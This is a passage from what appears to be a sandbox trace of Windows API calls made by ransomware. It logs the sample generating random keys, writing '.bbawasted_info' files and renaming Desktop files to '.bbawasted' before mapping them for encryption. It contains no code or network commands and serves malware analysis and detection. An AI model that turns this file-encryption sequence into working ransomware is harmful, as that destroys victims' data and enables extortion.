dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0069.587] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.587] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.596] SetEndOfFile (hFile=0x120) returned 1 [0069.598] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.598] CloseHandle (hObject=0x120) returned 1 [0069.599] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0069.599] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c5898 | out: hHeap=0x580000) returned 1 [0069.600] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0069.600] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.600] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.600] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o2MGjimD NX.ots") returned 57 [0069.600] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27c) returned 0x5c77b0 [0069.600] lstrcpyW (in: lpString1=0x5c7822, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.600] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.600] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0069.601] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.601] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o2MGjimD NX.ots.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o2mgjimd nx.ots.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.602] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.603] SetEndOfFile (hFile=0x120) returned 1 [0069.603] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.603] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.603] lstrcpyW (in: lpString1=0x5c7822, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.604] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o2MGjimD NX.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o2mgjimd nx.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o2MGjimD NX.ots.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o2mgjimd nx.ots.bbawasted")) returned 1 [0069.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o2MGjimD NX.ots.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o2mgjimd nx.ots.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.605] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0069.605] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0xb703 [0069.605] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb703) returned 0x570000 [0069.605] CloseHandle (hObject=0xf8) returned 1 [0069.608] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0069.608] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.608] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.608] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0069.609] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.609] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.649] SetEndOfFile (hFile=0x120) returned 1 [0069.652] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.652] CloseHandle (hObject=0x120) returned 1 [0069.654] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0069.654] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c5960 | out: hHeap=0x580000) returned 1 [0069.654] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0069.655] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.655] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.655] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UtQXWr02-P7M.m4a") returned 58 [0069.655] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27e) returned 0x5c77b0 [0069.655] lstrcpyW (in: lpString1=0x5c7824, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.655] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0069.655] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0069.655] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0069.656] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UtQXWr02-P7M.m4a.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\utqxwr02-p7m.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.657] WriteFile (in: hFile=0x120, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.658] SetEndOfFile (hFile=0x120) returned 1 [0069.659] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.659] lstrcpyW (in: lpString1=0x5c7824, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UtQXWr02-P7M.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\utqxwr02-p7m.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UtQXWr02-P7M.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\utqxwr02-p7m.m4a.bbawasted")) returned 1 [0069.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UtQXWr02-P7M.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\utqxwr02-p7m.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.660] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0069.660] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x3720 [0069.660] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3720) returned 0x570000 [0069.660] CloseHandle (hObject=0x110) returned 1 [0069.662] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0069.663] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.663] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.663] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0069.664] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.664] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.672] SetEndOfFile (hFile=0x120) returned 1 [0069.675] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.675] CloseHandle (hObject=0x120) returned 1 [0069.676] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0069.676] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c5bd8 | out: hHeap=0x580000) returned 1 [0069.676] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0069.677] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.677] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.677] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\X8rCKZpI8l.gif") returned 56 [0069.677] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27a) returned 0x5c77b0 [0069.677] lstrcpyW (in: lpString1=0x5c7820, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.677] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0069.677] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0069.678] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0069.678] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.678] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\X8rCKZpI8l.gif.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x8rckzpi8l.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.679] WriteFile (in: hFile=0x120, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.680] SetEndOfFile (hFile=0x120) returned 1 [0069.681] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.681] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.681] lstrcpyW (in: lpString1=0x5c7820, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\X8rCKZpI8l.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x8rckzpi8l.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\X8rCKZpI8l.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x8rckzpi8l.gif.bbawasted")) returned 1 [0069.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\X8rCKZpI8l.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x8rckzpi8l.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.682] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0069.682] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x36d0 [0069.682] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x36d0) returned 0x570000 [0069.682] CloseHandle (hObject=0xf8) returned 1 [0069.684] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0069.685] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.685] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.685] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0069.686] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.686] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.694] SetEndOfFile (hFile=0x120) returned 1 [0069.697] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.697] CloseHandle (hObject=0x120) returned 1 [0069.698] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0069.698] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c5ca8 | out: hHeap=0x580000) returned 1 [0069.698] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0069.699] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.699] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.699] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x_Yd8ttwFk.swf") returned 56 [0069.699] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27a) returned 0x5c77b0 [0069.699] lstrcpyW (in: lpString1=0x5c7820, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.699] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0069.699] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0069.700] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0069.700] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x_Yd8ttwFk.swf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x_yd8ttwfk.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.700] WriteFile (in: hFile=0x120, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.701] SetEndOfFile (hFile=0x120) returned 1 [0069.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.702] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.702] lstrcpyW (in: lpString1=0x5c7820, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.702] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x_Yd8ttwFk.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x_yd8ttwfk.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x_Yd8ttwFk.swf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x_yd8ttwfk.swf.bbawasted")) returned 1 [0069.703] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x_Yd8ttwFk.swf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x_yd8ttwfk.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.703] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0069.703] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x16cda [0069.703] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16cda) returned 0xfe0000 [0069.703] CloseHandle (hObject=0x110) returned 1 [0069.708] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0069.708] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.708] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.708] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0069.709] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.709] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.717] SetEndOfFile (hFile=0x120) returned 1 [0069.761] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.761] CloseHandle (hObject=0x120) returned 1 [0069.762] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0069.762] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c5d78 | out: hHeap=0x580000) returned 1 [0069.762] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0069.763] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.763] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.763] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zzpDivKV.pps") returned 54 [0069.763] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x276) returned 0x5c77b0 [0069.763] lstrcpyW (in: lpString1=0x5c781c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.763] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0069.763] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0069.764] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0069.764] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zzpDivKV.pps.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zzpdivkv.pps.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.765] WriteFile (in: hFile=0x120, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.766] SetEndOfFile (hFile=0x120) returned 1 [0069.766] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.766] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.766] lstrcpyW (in: lpString1=0x5c781c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.766] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zzpDivKV.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zzpdivkv.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zzpDivKV.pps.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zzpdivkv.pps.bbawasted")) returned 1 [0069.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zzpDivKV.pps.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zzpdivkv.pps.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.767] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0069.767] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0xb54e [0069.767] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb54e) returned 0x570000 [0069.767] CloseHandle (hObject=0x110) returned 1 [0069.770] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0069.771] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.771] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.771] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0069.772] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.772] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.783] SetEndOfFile (hFile=0x120) returned 1 [0069.785] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.785] CloseHandle (hObject=0x120) returned 1 [0069.786] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0069.786] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c5f28 | out: hHeap=0x580000) returned 1 [0069.786] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0069.787] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.787] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.787] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\afHQetjycFA rZ3.jpg") returned 68 [0069.787] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x292) returned 0x5c77b0 [0069.787] lstrcpyW (in: lpString1=0x5c7838, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.787] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 